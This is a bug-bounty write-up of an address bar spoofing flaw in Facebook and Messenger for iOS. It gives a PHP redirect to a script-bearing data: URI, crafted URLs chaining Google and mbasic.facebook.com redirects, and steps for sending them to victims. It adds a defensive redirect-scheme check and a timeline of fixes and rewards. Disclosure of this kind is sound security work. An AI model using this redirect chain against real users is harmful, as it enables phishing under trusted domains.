FB & Messenger for iOS : Address Bar spoofing using data uri

Summary: Facebook and Messenger for iOS were vulnerable to address bar spoofing, which could be reproduced by navigating from the target domain to the attacker's domain.

The attacker's domain was able to set the location to data:text/html,<script>…</script> via the Location header, so the data URI was executed in context while the target domain stayed in the URL bar.

Steps to reproduce:

Setup:
FBiOS : 229.0
MessengerForiOS: 223.0
Device: iPhone 6s
OS : 12.3.1

  • Create a PHP file with the code snippet below:
    <?php
    // Redirect whose target is a data: URI instead of an http(s) URL; the
    // in-app browser rendered it without updating the address bar.
    header("Location: data:text/html,<script>document.write('<h1>Rahul Kankrale: URL spoofing using Data Uri</h1>')</script>");
    ?>

    and save/host it on a server.

  • To spoof the Facebook domain, chain the exploit URL as below:
    https://www.google.com/url?q=https%3A%2F%2Fmbasic.facebook.com%2Fmessagingconfirmation%3Faction_url%3Dhttps%3A%2F%2Fyourmain%2Fexploit.php

    or, to spoof the Google domain:

    https://www.google.com/url?q=https%3A%2F%2Fyourmain%2Fexploit.php
  • Send the crafted URL to the victim through Messenger or post it on a Facebook wall. When the victim opens the Google redirect page and clicks the redirecting URL (or, for the Facebook PoC, opens the message-delete page and clicks the Delete button), the address bar shows the target domain with SSL while the content is generated by the data URI.
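The fix on the browser side is to refuse a Location header whose target is not an http(s) URL, and to always show the URL actually loaded. The following is an added example of that check (not code from the report or from Facebook); the domains attacker.example and the redirect chain are constructed for illustration.

```python
from urllib.parse import urlsplit, urljoin

# Schemes a WebView may load as a top-level document after a redirect.
# data:, javascript:, file: etc. must never replace the document while the
# previous origin is still shown in the address bar.
ALLOWED_REDIRECT_SCHEMES = {"http", "https"}


def resolve_redirect(current_url: str, location: str):
    """Resolve one Location header the way a hardened in-app browser should.

    Returns (allowed, display_url). When allowed is False the navigation is
    refused and the address bar keeps current_url; when True the address bar
    must switch to display_url, never stay on the pre-redirect domain.
    """
    target = urljoin(current_url, location.strip())
    scheme = urlsplit(target).scheme.lower()
    if scheme not in ALLOWED_REDIRECT_SCHEMES:
        return False, current_url
    return True, target


def check_redirect_chain(start_url: str, locations: list) -> dict:
    """Walk a list of Location headers and report the first refused hop."""
    url = start_url
    for hop, location in enumerate(locations):
        allowed, url = resolve_redirect(url, location)
        if not allowed:
            return {"final_url": url, "refused_at": hop, "location": location}
    return {"final_url": url, "refused_at": None, "location": None}


# Constructed chain mirroring the report: Google redirect -> mbasic.facebook.com
# -> attacker page -> data: URI. A correct browser stops at the last hop and
# shows the attacker's domain, not facebook.com, as the current location.
SAMPLE_CHAIN = [
    "https://mbasic.facebook.com/messagingconfirmation?action_url=https://attacker.example/exploit.php",
    "https://attacker.example/exploit.php",
    "data:text/html,<script>document.write('<h1>spoofed</h1>')</script>",
]

if __name__ == "__main__":
    print(check_redirect_chain("https://www.google.com/url?q=...", SAMPLE_CHAIN))
```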

Proof of concept:

Timeline:

  • 14/07/2019 : Reported to Facebook bugbounty.
  • 16/07/2019 : Pre-Triaged
  • 19/08/2019 : Triaged
  • 30/09/2019 : Fixed in FB
  • 29/10/2019 : Rewarded $1500 for FB(iOS) issue
  • 22/01/2020 : Fixed & Rewarded $1500 for Messenger(iOS) issue

Thanks